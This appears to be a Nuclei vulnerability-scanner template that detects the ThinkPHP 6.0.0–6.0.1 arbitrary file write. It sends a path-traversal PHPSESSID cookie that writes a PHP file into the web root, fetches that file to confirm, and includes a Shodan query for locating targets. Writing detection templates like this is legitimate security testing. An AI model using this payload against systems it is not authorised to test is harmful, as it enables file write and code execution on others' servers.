nuclei-templates/http/vulnerabilities/thinkphp6-arbitrary-write.yaml

46 lines
1.8 KiB
YAML
Raw Normal View History

2023-02-22 17:27:33 +00:00
id: thinkphp6-arbitrary-write
info:
2024-07-23 05:29:49 +00:00
name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write
author: arliya
severity: critical
2024-07-23 05:29:49 +00:00
description: |
ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string
2023-02-22 17:27:33 +00:00
reference: |
- https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591
- https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
2024-07-18 10:40:01 +00:00
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
2023-02-22 17:27:33 +00:00
metadata:
2024-07-23 05:29:49 +00:00
verified: true
max-request: 2
2024-09-10 08:22:50 +00:00
vendor: thinkphp
2024-09-10 09:08:16 +00:00
product: thinkphp
shodan-query: title:"ThinkPHP"
tags: thinkphp,file-upload,rce
variables:
random_filename: "{{to_lower(rand_base(11))}}"
2024-07-18 10:40:01 +00:00
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=/../../../public/{{random_filename}}.php
Content-Type: application/x-www-form-urlencoded
- |
2024-07-23 05:29:49 +00:00
GET /{{random_filename}}.php HTTP/1.1
2024-07-18 10:40:01 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2024-07-18 10:40:01 +00:00
part: header_1
words:
- "Set-Cookie: PHPSESSID=%2F..%2F..%2F..%2Fpublic%2F{{random_filename}}.php"
2024-07-18 10:40:01 +00:00
- type: dsl
dsl:
- "status_2 == 200"
2024-09-12 05:14:01 +00:00
# digest: 4b0a00483046022100fdbacdcc7bea301dfc6fbfd4ddb22b4f58f841114e774642419e12679ef3157e022100e94ccb9fc3d01fcf6537dd3eac67e37c84e546602e201557876eb2c632f20a46:922c64590222798bb761d5b6d8e72950